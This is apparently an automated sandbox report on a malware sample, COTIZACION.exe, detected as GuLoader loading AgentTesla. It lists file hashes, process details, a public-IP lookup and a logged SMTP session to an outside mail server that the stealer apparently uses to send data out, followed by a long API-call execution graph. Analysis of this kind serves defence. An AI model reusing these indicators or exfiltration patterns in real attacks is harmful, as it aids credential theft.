                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                              Host: api.ipify.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-11-05 11:38:38 UTC398INHTTP/1.1 200 OK
                                                                                              Date: Tue, 05 Nov 2024 11:38:38 GMT
                                                                                              Content-Type: text/plain
                                                                                              Content-Length: 14
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ddc8f062ad9d5db-DFW
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2032&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=1421000&cwnd=57&unsent_bytes=0&cid=bf63edef0ba4c821&ts=190&x=0"
                                                                                              2024-11-05 11:38:38 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                                              Data Ascii: 173.254.250.76


                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                              Nov 5, 2024 12:38:40.754591942 CET5876476667.23.226.139192.168.2.9220-super.nseasy.com ESMTP Exim 4.96.2 #2 Tue, 05 Nov 2024 06:38:40 -0500
                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                              220 and/or bulk e-mail.
                                                                                              Nov 5, 2024 12:38:40.754873037 CET64766587192.168.2.967.23.226.139EHLO 376483
                                                                                              Nov 5, 2024 12:38:40.906240940 CET5876476667.23.226.139192.168.2.9250-super.nseasy.com Hello 376483 [173.254.250.76]
                                                                                              250-SIZE 52428800
                                                                                              250-8BITMIME
                                                                                              250-PIPELINING
                                                                                              250-PIPECONNECT
                                                                                              250-STARTTLS
                                                                                              250 HELP
                                                                                              Nov 5, 2024 12:38:40.906735897 CET64766587192.168.2.967.23.226.139STARTTLS
                                                                                              Nov 5, 2024 12:38:41.060506105 CET5876476667.23.226.139192.168.2.9220 TLS go ahead

                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:06:37:09
                                                                                              Start date:05/11/2024
                                                                                              Path:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\COTIZACION.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'206'384 bytes
                                                                                              MD5 hash:AD3B285C00819C0AA52BB492CE560BC1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2000502828.0000000006398000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:06:38:16
                                                                                              Start date:05/11/2024
                                                                                              Path:C:\Users\user\Desktop\COTIZACION.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\COTIZACION.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'206'384 bytes
                                                                                              MD5 hash:AD3B285C00819C0AA52BB492CE560BC1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:30.7%
                                                                                                Dynamic/Decrypted Code Coverage:25.9%
                                                                                                Signature Coverage:16.5%
                                                                                                Total number of Nodes:826
                                                                                                Total number of Limit Nodes:18
                                                                                                execution_graph 3281 70021000 3284 7002101b 3281->3284 3291 7002156c 3284->3291 3286 70021020 3287 70021032 3286->3287 3288 70021024 GlobalAlloc 3286->3288 3289 700215c5 2 API calls 3287->3289 3288->3287 3290 70021019 3289->3290 3293 70021572 3291->3293 3292 70021578 3292->3286 3293->3292 3294 70021584 GlobalFree 3293->3294 3294->3286 3295 700212c6 3296 7002101b 4 API calls 3295->3296 3297 700212df 3296->3297 3298 70021aa7 3299 7002156c GlobalFree 3298->3299 3301 70021abf 3299->3301 3300 70021b01 GlobalFree 3301->3300 3302 70021add 3301->3302 3303 70021aed VirtualFree 3301->3303 3302->3300 3303->3300 3304 700210c7 3316 700210f8 3304->3316 3305 700212be GlobalFree 3306 700211d7 GlobalAlloc 3306->3316 3307 70021258 GlobalFree 3307->3316 3308 70021548 3 API calls 3308->3316 3309 700212ba 3309->3305 3310 70021296 GlobalFree 3310->3316 3311 700215eb 2 API calls 3313 700211ca GlobalFree 3311->3313 3312 70021638 lstrcpyW 3315 700211ab GlobalFree 3312->3315 3313->3316 3314 70021165 GlobalAlloc 3314->3316 3315->3316 3316->3305 3316->3306 3316->3307 3316->3308 3316->3309 3316->3310 3316->3311 3316->3312 3316->3314 3317 70021cc7 3318 70021cee 3317->3318 3319 70021d2f GlobalFree 3318->3319 3320 70021d4e __alldvrm 3318->3320 3319->3320 3321 700215eb 2 API calls 3320->3321 3322 70021de5 GlobalFree GlobalFree 3321->3322 2808 70021a4a 2809 70021aa1 2808->2809 2810 70021a5a VirtualProtect 2808->2810 2810->2809 3323 70021b0a 3324 70021b38 3323->3324 3325 70022351 21 API calls 3324->3325 3326 70021b3f 3325->3326 3327 70021b52 3326->3327 3328 70021b46 3326->3328 3330 70021b73 3327->3330 3331 70021b5c 3327->3331 3329 700215eb 2 API calls 3328->3329 3332 70021b50 3329->3332 3334 70021b79 3330->3334 3335 70021b9f 3330->3335 3333 700215c5 2 API calls 3331->3333 3337 70021b61 3333->3337 3338 70021668 2 API calls 3334->3338 3336 700215c5 2 API calls 3335->3336 3336->3332 3339 70021668 2 API calls 3337->3339 3340 70021b7e 3338->3340 3342 70021b67 3339->3342 3341 700215eb 2 API calls 3340->3341 3343 70021b84 GlobalFree 3341->3343 3344 700215eb 2 API calls 3342->3344 3343->3332 3345 70021b6d GlobalFree 3343->3345 3344->3345 3347 70022c6a 3348 70022cc3 3347->3348 3349 70022cd8 3347->3349 3348->3349 3350 70022ccd GetLastError 3348->3350 3350->3349 3367 40362d 3368 403653 3367->3368 3369 40363f SetTimer 3367->3369 3370 40365c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3368->3370 3371 4036aa 3368->3371 3369->3370 3370->3371 2415 404f70 2416 405111 2415->2416 2417 404f8f 2415->2417 2418 405125 GetDlgItem GetDlgItem 2416->2418 2438 40515e 2416->2438 2417->2416 2419 404f9b 2417->2419 2420 4054f8 18 API calls 2418->2420 2421 404fa0 SetWindowPos 2419->2421 2422 404fba 2419->2422 2423 405148 SetClassLongW 2420->2423 2425 4050fd 2421->2425 2427 40500d 2422->2427 2428 404fbf ShowWindow 2422->2428 2431 401533 90 API calls 2423->2431 2424 4051b5 2433 40510c 2424->2433 2486 4054c6 2424->2486 2525 405739 2425->2525 2429 405015 DestroyWindow 2427->2429 2430 40502f 2427->2430 2428->2425 2434 404fe4 GetWindowLongW 2428->2434 2435 405446 2429->2435 2436 405034 SetWindowLongW 2430->2436 2437 405047 2430->2437 2431->2438 2432 401399 90 API calls 2439 40518e 2432->2439 2434->2425 2441 405000 ShowWindow 2434->2441 2435->2433 2446 405479 ShowWindow 2435->2446 2436->2433 2437->2425 2444 405053 GetDlgItem 2437->2444 2438->2424 2438->2432 2439->2424 2445 405192 SendMessageW 2439->2445 2441->2425 2442 401533 90 API calls 2455 4051c7 2442->2455 2443 405448 DestroyWindow EndDialog 2443->2435 2447 405092 2444->2447 2448 40506f SendMessageW IsWindowEnabled 2444->2448 2445->2433 2446->2433 2451 4050a1 2447->2451 2453 4050e4 SendMessageW 2447->2453 2454 4050b3 2447->2454 2462 405099 2447->2462 2448->2433 2450 40508e 2448->2450 2450->2447 2451->2453 2451->2462 2453->2425 2457 4050ca 2454->2457 2458 4050bc 2454->2458 2455->2433 2455->2442 2455->2443 2461 4054f8 18 API calls 2455->2461 2477 405388 DestroyWindow 2455->2477 2489 405e98 2455->2489 2506 4054f8 2455->2506 2456 4050e2 2456->2425 2460 401533 90 API calls 2457->2460 2519 401533 2458->2519 2463 4050d1 2460->2463 2461->2455 2522 405936 2462->2522 2463->2425 2463->2462 2465 40524b GetDlgItem 2466 405272 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 2465->2466 2470 405266 2465->2470 2466->2470 2467 4052c7 GetSystemMenu EnableMenuItem SendMessageW 2468 4052f4 SendMessageW 2467->2468 2467->2470 2468->2470 2470->2466 2470->2467 2509 4054e1 SendMessageW 2470->2509 2510 405cf9 2470->2510 2513 406af8 lstrcpynW 2470->2513 2473 405326 lstrlenW 2474 405e98 17 API calls 2473->2474 2475 405340 SetWindowTextW 2474->2475 2514 401399 2475->2514 2477->2435 2478 4053a2 CreateDialogParamW 2477->2478 2478->2435 2479 4053d5 2478->2479 2480 4054f8 18 API calls 2479->2480 2481 4053e0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2480->2481 2482 401399 90 API calls 2481->2482 2483 405426 2482->2483 2483->2433 2484 40542e ShowWindow 2483->2484 2485 4054c6 SendMessageW 2484->2485 2485->2435 2487 4054de 2486->2487 2488 4054cf SendMessageW 2486->2488 2487->2455 2488->2487 2500 405ea3 2489->2500 2490 4060f1 2490->2455 2491 4060dc 2491->2490 2546 406af8 lstrcpynW 2491->2546 2494 4060a7 lstrlenW 2494->2500 2495 405fbc GetSystemDirectoryW 2495->2500 2497 405e98 10 API calls 2497->2494 2498 405fcf GetWindowsDirectoryW 2498->2500 2500->2491 2500->2494 2500->2495 2500->2497 2500->2498 2501 405ffc SHGetSpecialFolderLocation 2500->2501 2503 405e98 10 API calls 2500->2503 2504 406d1b CharNextW CharNextW CharNextW CharNextW CharPrevW 2500->2504 2505 406048 lstrcatW 2500->2505 2539 406955 2500->2539 2544 4065fd wsprintfW 2500->2544 2545 406af8 lstrcpynW 2500->2545 2501->2500 2502 406014 SHGetPathFromIDListW CoTaskMemFree 2501->2502 2502->2500 2503->2500 2504->2500 2505->2500 2507 405e98 17 API calls 2506->2507 2508 405503 SetDlgItemTextW 2507->2508 2508->2465 2509->2470 2511 405e98 17 API calls 2510->2511 2512 405d07 SetWindowTextW 2511->2512 2512->2470 2513->2473 2515 401413 2514->2515 2516 4013a3 2514->2516 2515->2455 2516->2515 2518 4013df MulDiv SendMessageW 2516->2518 2551 40154a 2516->2551 2518->2516 2520 401399 90 API calls 2519->2520 2521 401547 2520->2521 2521->2462 2523 405943 SendMessageW 2522->2523 2524 40593d 2522->2524 2523->2456 2524->2523 2526 405751 GetWindowLongW 2525->2526 2536 405807 2525->2536 2527 405766 2526->2527 2526->2536 2528 40579a 2527->2528 2529 40578e GetSysColor 2527->2529 2527->2536 2530 4057a8 SetBkMode 2528->2530 2531 40579e SetTextColor 2528->2531 2529->2528 2532 4057d0 2530->2532 2533 4057c1 GetSysColor 2530->2533 2531->2530 2534 4057e1 2532->2534 2535 4057d4 SetBkColor 2532->2535 2533->2532 2534->2536 2537 4057f1 DeleteObject 2534->2537 2538 4057fa CreateBrushIndirect 2534->2538 2535->2534 2536->2433 2537->2538 2538->2536 2547 4062b6 2539->2547 2542 4069bb 2542->2500 2543 40698a RegQueryValueExW RegCloseKey 2543->2542 2544->2500 2545->2500 2546->2490 2548 4062c5 2547->2548 2549 4062c9 2548->2549 2550 4062ce RegOpenKeyExW 2548->2550 2549->2542 2549->2543 2550->2549 2552 4015c3 2551->2552 2602 4015ce 2551->2602 2553 4016c1 2552->2553 2554 4017c2 2552->2554 2555 4015e6 2552->2555 2556 4018cb 2552->2556 2557 4016ef 2552->2557 2558 4016af 2552->2558 2559 40182f 2552->2559 2560 401711 2552->2560 2561 401633 SetForegroundWindow 2552->2561 2562 4017d3 2552->2562 2563 4015d5 2552->2563 2564 401618 2552->2564 2565 4015f9 2552->2565 2566 40189b 2552->2566 2567 4018de 2552->2567 2568 40163f 2552->2568 2552->2602 2636 40160c 2552->2636 2579 4016d1 ShowWindow 2553->2579 2580 4016d9 2553->2580 2570 40303e 17 API calls 2554->2570 2569 4015f0 PostQuitMessage 2555->2569 2555->2602 2574 40303e 17 API calls 2556->2574 2665 40303e 2557->2665 2734 4065fd wsprintfW 2558->2734 2577 40303e 17 API calls 2559->2577 2571 40303e 17 API calls 2560->2571 2561->2602 2573 40303e 17 API calls 2562->2573 2592 405d18 24 API calls 2563->2592 2563->2602 2662 403002 2564->2662 2595 401399 73 API calls 2565->2595 2572 40303e 17 API calls 2566->2572 2576 40303e 17 API calls 2567->2576 2599 403002 17 API calls 2568->2599 2568->2602 2569->2602 2582 4017c8 2570->2582 2583 401718 2571->2583 2584 4018a2 SearchPathW 2572->2584 2586 4017da 2573->2586 2587 4018d2 2574->2587 2589 4018e5 2576->2589 2590 401835 GetFullPathNameW 2577->2590 2579->2580 2591 4016e6 ShowWindow 2580->2591 2580->2602 2738 4065ad FindFirstFileW 2582->2738 2670 406ba3 CharNextW CharNextW 2583->2670 2584->2602 2585 405d18 24 API calls 2585->2602 2597 40303e 17 API calls 2586->2597 2700 406a34 2587->2700 2588 40161e Sleep 2588->2602 2606 401906 2589->2606 2607 40190e 2589->2607 2600 401857 2590->2600 2601 40184d 2590->2601 2591->2602 2592->2602 2595->2602 2603 4017e3 2597->2603 2599->2602 2600->2601 2613 4065ad 2 API calls 2600->2613 2601->2602 2604 401889 GetShortPathNameW 2601->2604 2602->2516 2605 40303e 17 API calls 2603->2605 2604->2602 2609 4017ec MoveFileW 2605->2609 2746 406af8 lstrcpynW 2606->2746 2747 406af8 lstrcpynW 2607->2747 2614 401804 2609->2614 2609->2636 2612 401790 2688 405d18 2612->2688 2618 40186a 2613->2618 2614->2602 2621 4065ad 2 API calls 2614->2621 2615 40190c 2704 406d1b 2615->2704 2616 401919 2748 406534 lstrlenW CharPrevW 2616->2748 2618->2601 2745 406af8 lstrcpynW 2618->2745 2628 401814 2621->2628 2628->2602 2741 40621b MoveFileExW 2628->2741 2629 4017a2 SetCurrentDirectoryW 2629->2602 2631 401720 2632 401769 GetFileAttributesW 2631->2632 2633 401780 2631->2633 2676 4065d4 2631->2676 2680 4064da 2631->2680 2683 405e1c CreateDirectoryW 2631->2683 2735 405dfc CreateDirectoryW 2631->2735 2632->2631 2633->2612 2633->2636 2634 401968 2751 406b7b GetFileAttributesW 2634->2751 2636->2585 2637 4065ad 2 API calls 2653 40192b 2637->2653 2640 40193f CompareFileTime 2640->2653 2641 401a18 2643 405d18 24 API calls 2641->2643 2642 4019fd 2645 405d18 24 API calls 2642->2645 2646 401a24 2643->2646 2644 406af8 lstrcpynW 2644->2653 2645->2602 2714 403148 2646->2714 2649 401a52 SetFileTime 2650 401a60 CloseHandle 2649->2650 2650->2602 2652 401a73 2650->2652 2651 405e98 17 API calls 2651->2653 2654 401a78 2652->2654 2655 401a89 2652->2655 2653->2563 2653->2634 2653->2637 2653->2640 2653->2641 2653->2642 2653->2644 2653->2651 2713 4068f9 GetFileAttributesW CreateFileW 2653->2713 2754 406a86 2653->2754 2656 405e98 17 API calls 2654->2656 2657 405e98 17 API calls 2655->2657 2658 401a80 lstrcatW 2656->2658 2659 401a91 2657->2659 2658->2659 2661 406a86 MessageBoxIndirectW 2659->2661 2661->2602 2663 405e98 17 API calls 2662->2663 2664 403016 2663->2664 2664->2588 2666 405e98 17 API calls 2665->2666 2667 403067 2666->2667 2668 4016f6 SetFileAttributesW 2667->2668 2669 406d1b 5 API calls 2667->2669 2668->2602 2669->2668 2671 406bc1 2670->2671 2672 406bf8 2670->2672 2673 406bd0 CharNextW 2671->2673 2674 406bd5 2671->2674 2672->2631 2673->2672 2674->2672 2675 4065d4 CharNextW 2674->2675 2675->2674 2677 4065e0 2676->2677 2678 4065fa 2676->2678 2677->2678 2679 4065e9 CharNextW 2677->2679 2678->2631 2679->2677 2679->2678 2758 4068c4 GetModuleHandleA 2680->2758 2684 405e67 GetLastError 2683->2684 2685 405e8a 2683->2685 2684->2685 2686 405e74 SetFileSecurityW 2684->2686 2685->2631 2686->2685 2687 405e8e GetLastError 2686->2687 2687->2685 2689 405d2a 2688->2689 2695 401797 2688->2695 2690 405d49 lstrlenW 2689->2690 2691 405e98 17 API calls 2689->2691 2692 405d5b lstrlenW 2690->2692 2693 405d7e 2690->2693 2691->2690 2694 405d70 lstrcatW 2692->2694 2692->2695 2696 405d95 2693->2696 2697 405d88 SetWindowTextW 2693->2697 2694->2693 2699 406af8 lstrcpynW 2695->2699 2696->2695 2698 405d9a SendMessageW SendMessageW SendMessageW 2696->2698 2697->2696 2698->2695 2699->2629 2701 406a41 GetTickCount GetTempFileNameW 2700->2701 2702 406a75 2701->2702 2703 406a79 2701->2703 2702->2701 2702->2703 2703->2602 2707 406d30 2704->2707 2705 406db2 2706 406dba CharPrevW 2705->2706 2709 406dda 2705->2709 2706->2705 2707->2705 2708 406da3 CharNextW 2707->2708 2710 4065d4 CharNextW 2707->2710 2711 406d8f CharNextW 2707->2711 2712 406d9e CharNextW 2707->2712 2708->2705 2708->2707 2709->2653 2710->2707 2711->2707 2712->2708 2713->2653 2715 403190 2714->2715 2716 403183 2714->2716 2767 406926 ReadFile 2715->2767 2774 403131 SetFilePointer 2716->2774 2720 4031b6 GetTickCount 2729 401a3a 2720->2729 2731 4031e6 2720->2731 2721 4032f9 2722 403340 2721->2722 2723 4032fd 2721->2723 2725 40311b ReadFile 2722->2725 2726 40311b ReadFile 2723->2726 2727 4069e9 WriteFile 2723->2727 2723->2729 2725->2729 2726->2723 2727->2723 2728 40323d GetTickCount 2728->2731 2729->2649 2729->2650 2730 40326e MulDiv wsprintfW 2732 405d18 24 API calls 2730->2732 2731->2728 2731->2729 2731->2730 2769 40311b 2731->2769 2772 4069e9 WriteFile 2731->2772 2732->2731 2734->2602 2736 405e16 2735->2736 2737 405e0e GetLastError 2735->2737 2736->2631 2737->2736 2739 4065c3 FindClose 2738->2739 2740 4065ce 2738->2740 2739->2740 2740->2602 2742 40623c 2741->2742 2743 40622f 2741->2743 2742->2636 2775 4062e4 2743->2775 2745->2601 2746->2615 2747->2616 2749 406551 lstrcatW 2748->2749 2750 40191f lstrcatW 2748->2750 2749->2750 2750->2615 2752 406b9d 2751->2752 2753 406b8d SetFileAttributesW 2751->2753 2752->2653 2753->2752 2755 406a9b 2754->2755 2756 406ae9 2755->2756 2757 406ab1 MessageBoxIndirectW 2755->2757 2756->2653 2757->2756 2759 4068e6 GetProcAddress 2758->2759 2760 4068dc 2758->2760 2762 4064e1 2759->2762 2764 40617c GetSystemDirectoryW 2760->2764 2762->2631 2763 4068e2 2763->2759 2763->2762 2766 40619e wsprintfW LoadLibraryExW 2764->2766 2766->2763 2768 4031a2 2767->2768 2768->2720 2768->2721 2768->2729 2770 406926 ReadFile 2769->2770 2771 40312e 2770->2771 2771->2731 2773 406a0a 2772->2773 2773->2731 2774->2715 2776 406314 2775->2776 2777 40633a GetShortPathNameW 2775->2777 2802 4068f9 GetFileAttributesW CreateFileW 2776->2802 2779 40641a 2777->2779 2780 40634f 2777->2780 2779->2742 2780->2779 2782 406357 wsprintfA 2780->2782 2781 40631e CloseHandle GetShortPathNameW 2781->2779 2783 406332 2781->2783 2784 405e98 17 API calls 2782->2784 2783->2777 2783->2779 2785 406380 2784->2785 2803 4068f9 GetFileAttributesW CreateFileW 2785->2803 2787 40638d 2787->2779 2788 406398 GetFileSize GlobalAlloc 2787->2788 2789 406413 CloseHandle 2788->2789 2790 4063b7 2788->2790 2789->2779 2791 406926 ReadFile 2790->2791 2792 4063bf 2791->2792 2792->2789 2804 406b14 lstrlenA lstrlenA 2792->2804 2795 4063d2 lstrcpyA 2798 4063e4 2795->2798 2796 40641f 2797 406b14 3 API calls 2796->2797 2797->2798 2799 4063f5 SetFilePointer 2798->2799 2800 4069e9 WriteFile 2799->2800 2801 40640c GlobalFree 2800->2801 2801->2789 2802->2781 2803->2787 2805 4063ce 2804->2805 2806 406b33 2804->2806 2805->2795 2805->2796 2806->2805 2807 406b60 lstrlenA 2806->2807 2807->2805 2807->2806 2811 7002167a 2812 700216b7 2811->2812 2853 70022351 2812->2853 2814 700216be 2815 700217ef 2814->2815 2816 700216d6 2814->2816 2817 700216cf 2814->2817 2883 70022049 2816->2883 2899 70021fcb 2817->2899 2822 7002170a 2837 70021700 2822->2837 2909 70022f9f 2822->2909 2823 700216eb 2827 700216f5 2823->2827 2831 70021702 2823->2831 2824 70021722 2912 70022209 2824->2912 2825 70021740 2828 70021791 2825->2828 2829 70021746 2825->2829 2827->2837 2893 70022d14 2827->2893 2835 70022209 9 API calls 2828->2835 2930 70021f1e 2829->2930 2830 70021728 2922 70021668 2830->2922 2903 700217f7 2831->2903 2840 7002177e 2835->2840 2837->2824 2837->2825 2852 700217de 2840->2852 2933 7002200d 2840->2933 2842 70021708 2842->2837 2843 70022209 9 API calls 2843->2840 2847 700217e8 GlobalFree 2847->2815 2848 700217cf 2848->2852 2937 700215c5 2848->2937 2850 700217c2 FreeLibrary 2850->2848 2852->2815 2852->2847 2941 700212f8 GlobalAlloc 2853->2941 2855 7002237f 2942 700212f8 GlobalAlloc 2855->2942 2857 70022a3a GlobalFree GlobalFree GlobalFree 2858 70022a5a 2857->2858 2873 70022aa7 2857->2873 2859 70022af7 2858->2859 2864 70022a73 2858->2864 2858->2873 2860 70022b19 GetModuleHandleW 2859->2860 2859->2873 2862 70022b2a LoadLibraryW 2860->2862 2863 70022b3f 2860->2863 2861 70022947 GlobalAlloc 2878 7002238a 2861->2878 2862->2863 2862->2873 2949 70021f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2863->2949 2870 700212e1 2 API calls 2864->2870 2864->2873 2866 7002299f lstrcpyW 2866->2878 2867 700229bd GlobalFree 2867->2878 2868 70022b8e 2869 70022b9c lstrlenW 2868->2869 2868->2873 2950 70021f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2869->2950 2870->2873 2871 700229af lstrcpyW 2871->2878 2873->2814 2874 70022b4c 2874->2868 2881 70022b78 GetProcAddress 2874->2881 2875 70022bb6 2875->2873 2877 70022822 GlobalFree 2877->2878 2878->2857 2878->2861 2878->2866 2878->2867 2878->2871 2878->2877 2880 700229fb 2878->2880 2943 700212f8 GlobalAlloc 2878->2943 2944 700212e1 2878->2944 2880->2878 2947 70021309 GlobalSize GlobalAlloc 2880->2947 2881->2868 2890 7002205e 2883->2890 2885 70022124 GlobalAlloc WideCharToMultiByte 2887 700221be GlobalFree 2885->2887 2886 70022154 GlobalAlloc CLSIDFromString 2886->2890 2888 700216dc 2887->2888 2887->2890 2888->2822 2888->2823 2888->2837 2889 700212e1 lstrcpynW GlobalAlloc 2889->2890 2890->2885 2890->2886 2890->2887 2890->2889 2892 70022179 2890->2892 2952 70021548 2890->2952 2892->2887 2957 700219db 2892->2957 2894 70022d26 2893->2894 2895 70022dcb ReadFile 2894->2895 2898 70022de9 2895->2898 2960 70022cbf 2898->2960 2900 70021fde 2899->2900 2901 70021fe9 GlobalAlloc 2900->2901 2902 700216d5 2900->2902 2901->2900 2902->2816 2907 70021823 2903->2907 2904 70021897 GlobalAlloc 2908 700218b5 2904->2908 2905 700218a8 2906 700218ac GlobalSize 2905->2906 2905->2908 2906->2908 2907->2904 2907->2905 2908->2842 2910 70022faa 2909->2910 2911 70022fea GlobalFree 2910->2911 2963 700212f8 GlobalAlloc 2912->2963 2914 70022280 MultiByteToWideChar 2918 70022211 2914->2918 2915 700222a6 StringFromGUID2 2915->2918 2916 700222b7 lstrcpynW 2916->2918 2917 700222ee GlobalFree 2917->2918 2918->2914 2918->2915 2918->2916 2918->2917 2919 70022325 GlobalFree 2918->2919 2920 700215eb 2 API calls 2918->2920 2964 70021638 2918->2964 2919->2830 2920->2918 2968 700212f8 GlobalAlloc 2922->2968 2924 7002166d 2925 70021f1e lstrcpyW 2924->2925 2926 70021677 2925->2926 2927 700215eb 2926->2927 2928 70021633 GlobalFree 2927->2928 2929 700215f4 GlobalAlloc lstrcpynW 2927->2929 2928->2840 2929->2928 2931 70021f5c lstrcpyW 2930->2931 2932 70021765 2930->2932 2931->2932 2932->2843 2934 7002201c 2933->2934 2935 700217a4 2933->2935 2934->2935 2936 70022033 GlobalFree 2934->2936 2935->2848 2935->2850 2936->2934 2938 700215dd 2937->2938 2939 700215eb 2 API calls 2938->2939 2940 700215e6 2939->2940 2940->2852 2941->2855 2942->2878 2943->2878 2951 700212f8 GlobalAlloc 2944->2951 2946 700212f0 lstrcpynW 2946->2878 2948 70021327 2947->2948 2948->2880 2949->2874 2950->2875 2951->2946 2953 70021555 2952->2953 2954 700212f8 GlobalAlloc 2952->2954 2955 700212e1 2 API calls 2953->2955 2954->2890 2956 7002156a 2955->2956 2956->2890 2958 700219ea VirtualAlloc 2957->2958 2959 70021a48 2957->2959 2958->2959 2959->2892 2961 70022cd8 2960->2961 2962 70022ccd GetLastError 2960->2962 2961->2837 2962->2961 2963->2918 2965 70021663 2964->2965 2966 7002163f 2964->2966 2965->2918 2966->2965 2967 70021648 lstrcpyW 2966->2967 2967->2965 2968->2924 3351 7002103a 3352 70021052 3351->3352 3353 700210c5 3352->3353 3354 70021081 3352->3354 3355 70021061 3352->3355 3357 7002156c GlobalFree 3354->3357 3356 7002156c GlobalFree 3355->3356 3358 70021072 3356->3358 3361 70021079 3357->3361 3359 7002156c GlobalFree 3358->3359 3359->3361 3360 70021091 GlobalSize 3362 7002109a 3360->3362 3361->3360 3361->3362 3363 7002109e GlobalAlloc 3362->3363 3366 700210af 3362->3366 3364 700215c5 2 API calls 3363->3364 3364->3366 3365 700210b8 GlobalFree 3365->3353 3366->3365 2969 4036da SetErrorMode GetVersionExW 2970 403725 GetVersionExW 2969->2970 2972 40375c 2969->2972 2971 403747 2970->2971 2971->2972 2973 4037c3 2972->2973 2974 4068c4 5 API calls 2972->2974 2975 40617c 3 API calls 2973->2975 2974->2973 2976 4037d9 lstrlenA 2975->2976 2976->2973 2977 4037e7 2976->2977 2978 4068c4 5 API calls 2977->2978 2979 4037ee 2978->2979 2980 4068c4 5 API calls 2979->2980 2981 4037f5 2980->2981 2982 4068c4 5 API calls 2981->2982 2983 403801 #17 OleInitialize SHGetFileInfoW 2982->2983 3059 406af8 lstrcpynW 2983->3059 2986 40384f GetCommandLineW 3060 406af8 lstrcpynW 2986->3060 2988 403860 2989 4065d4 CharNextW 2988->2989 2990 40389a CharNextW 2989->2990 2991 403988 GetTempPathW 2990->2991 2998 4038b3 2990->2998 3061 403c83 2991->3061 2993 4039a0 2994 4039a4 GetWindowsDirectoryW lstrcatW 2993->2994 2995 4039fa DeleteFileW 2993->2995 2996 403c83 12 API calls 2994->2996 3071 4033cb GetTickCount GetModuleFileNameW 2995->3071 2999 4039c0 2996->2999 2998->2991 3000 4065d4 CharNextW 2998->3000 3007 403974 2998->3007 2999->2995 3002 4039c4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2999->3002 3000->2998 3001 403a0d 3004 4065d4 CharNextW 3001->3004 3011 403a90 3001->3011 3044 403a82 3001->3044 3003 403c83 12 API calls 3002->3003 3008 4039f2 3003->3008 3017 403a2c 3004->3017 3160 406af8 lstrcpynW 3007->3160 3008->2995 3008->3011 3178 4036b0 3011->3178 3012 403bd7 3014 406a86 MessageBoxIndirectW 3012->3014 3013 403bea 3015 403bf3 GetCurrentProcess OpenProcessToken 3013->3015 3016 403be2 ExitProcess 3013->3016 3014->3016 3021 403c0b LookupPrivilegeValueW AdjustTokenPrivileges 3015->3021 3022 403c3f 3015->3022 3018 403a56 3017->3018 3019 403a97 3017->3019 3161 406616 3018->3161 3024 4064da 5 API calls 3019->3024 3021->3022 3023 4068c4 5 API calls 3022->3023 3026 403c46 3023->3026 3027 403a9c lstrcatW 3024->3027 3029 403c5b ExitWindowsEx 3026->3029 3032 403c68 3026->3032 3030 403ac0 lstrcatW lstrcmpiW 3027->3030 3031 403ab1 lstrcatW 3027->3031 3029->3016 3029->3032 3030->3011 3033 403ae7 3030->3033 3031->3030 3035 401533 90 API calls 3032->3035 3036 403af0 3033->3036 3037 403af7 3033->3037 3035->3016 3039 405e1c 4 API calls 3036->3039 3040 405dfc 2 API calls 3037->3040 3038 403a77 3176 406af8 lstrcpynW 3038->3176 3042 403af5 3039->3042 3043 403afc SetCurrentDirectoryW 3040->3043 3042->3043 3045 403b10 3043->3045 3046 403b1f 3043->3046 3099 405a1c 3044->3099 3177 406af8 lstrcpynW 3045->3177 3156 406af8 lstrcpynW 3046->3156 3049 405e98 17 API calls 3050 403b4f DeleteFileW 3049->3050 3051 403b5a CopyFileW 3050->3051 3056 403b2d 3050->3056 3051->3056 3052 403bb3 3053 40621b 35 API calls 3052->3053 3053->3011 3054 40621b 35 API calls 3054->3056 3055 405e98 17 